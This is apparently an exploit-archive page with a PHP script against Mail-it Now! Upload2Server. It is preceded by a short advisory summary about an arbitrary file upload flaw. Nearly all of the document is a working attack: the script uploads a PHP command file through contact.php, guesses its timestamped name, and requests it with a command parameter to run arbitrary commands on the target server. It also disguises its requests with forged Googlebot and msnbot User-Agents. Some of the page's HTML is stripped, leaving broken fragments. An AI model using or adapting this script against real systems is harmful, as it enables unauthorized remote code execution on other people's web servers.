Mail-it Now! remote commands execution

source: https://www.securityfocus.com/bid/14821/info Mail-it Now! Upload2Server is prone to an arbitrary file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before uploading files. Successful exploitation will cause the application to execute the file in the security context of the Web server process. This may facilitate unauthorized access; other attacks are also possible. Mail-it Now! remote commands execution

Mail-it Now! (possibly prior versions) remote commands execution

a script by rgod at http://rgod.altervista.org

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "

	".$headeri[$li+$ki]."
0".$datai."	".$datai."		".$headeri[$li]."

"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a) $html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($command<>'')) { if ($port=='') {$port=80;} # step 1 -> upload an attachment //we have an error in "From" field so no mail will be sent //however the attachment will be uploaded :) $data='-----------------------------7d53ac1721026e Content-Disposition: form-data; name="From" jimihendrix@j@imihendrix.jim -----------------------------7d53ac1721026e Content-Disposition: form-data; name="Name" jimihendrix -----------------------------7d53ac1721026e Content-Disposition: form-data; name="Msg" ciao -----------------------------7d53ac1721026e Content-Disposition: form-data; name="fileup[]"; filename="C:\cmd.php" Content-Type: text/plain -----------------------------7d53ac1721026e Content-Disposition: form-data; name="fileup[]"; filename="" Content-Type: application/octet-stream -----------------------------7d53ac1721026e Content-Disposition: form-data; name="submit" Send -----------------------------7d53ac1721026e--'; if ($proxy=='') { $packet="POST ".$path."/contact.php HTTP/1.1\r\n";} else { $packet="POST http://".$host.$path."/contact.php HTTP/1.1\r\n";} $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.$path."/contact.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d53ac1721026e\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; show($packet); $mytime=time(); //I do my best to guess filename, contact.php determine it in this way: [time() function result][-][filename you choose] sendpacket($packet); # step 2 -> launch commands... echo 'if contact.php is vulnerable, now you will see ' htmlentities($command).' output
'; for ($i=0; $i<=3; $i++) //no more of 3 retries... { if ($proxy=='') {$packet="GET ".$path.$uploaddir.strval($mytime+$i)."-cmd.php?command=" urlencode($command)." HTTP/1.1\r\n";} else {$packet="GET http://".$host.$path.$uploaddir.strval($mytime+$i)."-cmd php?command=".urlencode($command)." HTTP/1.1\r\n";} $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host."\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Keep-Alive\r\n\r\n"; show($packet); sendpacket($packet); if (!eregi('was not found on this server',$html)) {break;} //cycle until you do not have a NOT FOUND error message } } ?>

Query Builder